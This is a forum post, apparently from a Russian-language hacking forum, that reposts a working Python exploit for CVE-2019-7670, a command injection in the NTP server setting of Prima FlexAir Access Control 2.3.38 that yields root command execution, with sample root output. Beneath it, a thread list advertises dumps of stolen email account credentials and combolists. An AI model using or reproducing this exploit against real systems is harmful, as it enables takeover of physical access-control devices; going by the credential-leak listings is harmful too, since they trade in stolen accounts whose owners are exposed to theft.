Интересно - Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

Original poster

Pro Member

27.03.2020

# Exploit Title: Prima FlexAir Access Control 2.3.38 - Remote Code Execution
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: LiquidWorm
# Vendor Homepage:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Software Link:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Version: 2.3.38
# Tested on: NA
# CVE : CVE-2019-7670

#!/usr/bin/env python
#
# Authenticated Remote Root Exploit for Prima FlexAir Access Control 2.3.38
# via Command Injection in SetNTPServer request, Server parameter.
#
# CVE: CVE-2019-7670
# Advisory:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

# Paper:

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

#
# By Gjoko 'LiquidWorm' Krstic
#
# 18.01.2019
#
################################################## ##########################
#
# $ python ntpcmdinj.py
# [+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]
# [+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 "uname -a"
# Linux Alpha 4.4.16 #1 Mon Aug 29 13:29:40 CEST 2016 armv7l GNU/Linux
#
# $ python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

11339284 id
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
#
################################################## ##########################
#

import requests
import sys#####

if len(sys.argv) < 4:
print '[+] Usage: python ntpcmdinj.py [Target] [Session-ID] [Command]'
print '[+] Example: python ntpcmdinj.py

Авторизируйтесь или Зарегистрируйтесь что бы просматривать ссылки.

10167847 whoami\n'
sys.exit()

host = sys.argv[1]
sessionid = sys.argv[2]
commando = sys.argv[3]

url = host+"/bin/sysfcgi.fx"

headers = {"Session-ID" : sessionid, # Muy importante!
"User-Agent" : "Dj/Ole",
"Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8",
"Accept" : "text/html, */*; q=0.01",
"Session-Pc" : "2",
"X-Requested-With" : "XMLHttpRequest",
"Accept-Encoding" : "gzip, deflate",
"Accept-Language" : "en-US,en;q=0.9"}

payload = ("<requests><request name="SetNTPServer">"
"<param name="Server" value="2.europe.p"
"ool.ntp.org;"+commando+">/www/pages/ap"
"p/images/logos/stage.txt|"/></request></"
"requests>")

requests.post(url, headers=headers, data=payload)

e = requests.get(host+"/app/images/logos/stage.txt")
print e.text

Автор	Заголовок	Раздел	Дата
M	Valid 1.9K Full Valid Fresh Mail Access Top Quality 14.03	Раздача email	Вчера в 15:48
M	MIX 31K Full Valid Mail Access Mix Top Quality By MegaCloud 14.03	Раздача email	Вчера в 11:27
	16.947 Lines Combolist with Mail Access	Раздача email	Четверг в 18:17
M	Valid 1.9K Full Valid EU USA Just Mail Access By Mega 13.03	Раздача email	Четверг в 17:18
M	Valid 15.5K Full Valid Mail Access Mix Usa EU Asia 13.03	Раздача email	Четверг в 15:38
	14.439 Lines Mail Access Leak Good hits	Раздача email	Четверг в 11:53
M	Valid 3.3 K Full Mail Access Bu megaCloud 12.03	Раздача email	Среда в 22:48
M	3.3K Mail Access Full Valid 12.03	Раздача email	Среда в 20:37
M	MIX 18K Fresh Cheked Full mail Access By MegaCloud12.03	Раздача email	Среда в 18:26
M	MIX 23K Full Valid Mail Access Mix By MegaCloud 12.03	Раздача email	Среда в 18:14
	4.027 Lines With Mail Access	Раздача email	Вторник в 18:15
B	[4.130] Lines ☣️Fresh Checked With Mail Access	Раздача email	Вторник в 15:24
B	[2.711] Lines ☣️Mail Access Leak Good hits	Раздача email	Вторник в 05:56
B	[3.877] Lines ☣️Mail Access Leak Good hits	Раздача email	Вторник в 02:47
B	[3.598.912] Lines ☣️ LEak With Mail Access 2025	Раздача email	Понедельник в 10:59
	5.928 Lines Mail Access Leak Good hits	Раздача email	Понедельник в 07:05
	(398.141 lines) Mail Access Goods hits	Раздача email	Понедельник в 05:28
	(572.121 lines) HQ Leak Good For hits Access BinaryCloud	Раздача email	Понедельник в 02:19
	(407.126 lines) HQ Leak Good For hits Access BinaryCloud	Раздача email	Воскресенье в 16:48
B	[2.023] Lines ☣️Combolist with Mail Access	Раздача email	Воскресенье в 00:08
	(588.643 lines) HQ Leak Good For hits Access BinaryCloud	Раздача email	08.03.2025
	(616.687 lines) Mail Access Goods hits	Раздача email	08.03.2025
	(573.828 lines) Mail Access Goods hits	Раздача email	08.03.2025
M	Valid 2.4K Full Valid Mail Access Mix By MegaCloud 07.03	Раздача email	07.03.2025
	(523.697 lines) Mail Access Goods hits	Раздача email	07.03.2025
M	MIX 36 K Full Valid Mail Access Mix By MegaCloud 07.03	Раздача email	07.03.2025
	(685.424 lines) HQ Leak Good For hits Access BinaryCloud	Раздача email	07.03.2025
	(585.699 lines) Mail Access Goods hits	Раздача email	06.03.2025
M	Valid 4.7K (FULL VALID) HOTMAIL ACCESS BY MEGACLOUD 06.03	Раздача email	06.03.2025
	(341.253 lines) HQ Leak Good For hits Access BinaryCloud	Раздача email	06.03.2025
M	Valid 2.1K Fresh Checked Mail Access ByMegaCloud 06.03	Раздача email	06.03.2025
M	Valid 4.6K Full Mail Access Hotmail Hits Check Now! 06.03	Раздача email	06.03.2025
	(626.739 lines) Mail Access Goods hits	Раздача email	06.03.2025
M	Valid 5.8k Just Good Mail Access . Top Quality By Mega 05.03	Раздача email	06.03.2025
M	Valid 11.8K USA EU Just Mail Access Full Valid Mix By MegaCloud 05.03	Раздача email	05.03.2025
M	Valid 2K Full Valid Mail Access USA EU 05.03	Раздача email	05.03.2025
M	Valid Full Valid FRANCE Just MAIL ACCESS 05.03	Раздача email	05.03.2025
M	Valid 28.6K Mail Access Mix By MegaCloud 05.03	Раздача email	05.03.2025
B	[4.003] Lines ☣️Mail Access Leak Good hits	Раздача email	05.03.2025
M	MIX 22k Full Valid Fresh Checked Mail Access Mix By MegaCloud 05.03	Раздача email	05.03.2025
M	MIX 19 K Full Vailid Mail Access Mix By MegaCloud 05.03	Раздача email	05.03.2025
	(486.999 lines) Mail Access Goods hits	Раздача email	04.03.2025
B	[1.020.295] Lines ☣️ LEak With Mail Access 2025	Раздача email	04.03.2025
M	Valid 6K Full Mail Access Mix Top Quality By MegaCloud 03.03	Раздача email	04.03.2025
M	Valid 3.5K Hotmail Hits Ful Mail Access By megaCloud 03.03	Раздача email	03.03.2025
M	Valid 6K Full Valid Mail Access Mix By MegaCloud 02.03	Раздача email	02.03.2025
M	Valid 21k Fresh Checked Usa Eu Asia Mail Access Mix 02.03	Раздача email	02.03.2025
	4.984 Lines Mail Access Leak Good hits	Раздача email	02.03.2025
M	MIX 1.7k China Full Valid Just Mail Access ByMegaCloud 01.03	Раздача email	01.03.2025
M	Valid 4.9K Fresh Mail Access Mix ByMegaCloud 28.02	Раздача email	01.03.2025

Интересно Prima FlexAir Access Control 2.3.38 - Remote Code Execution

GhosTM@n

Название темы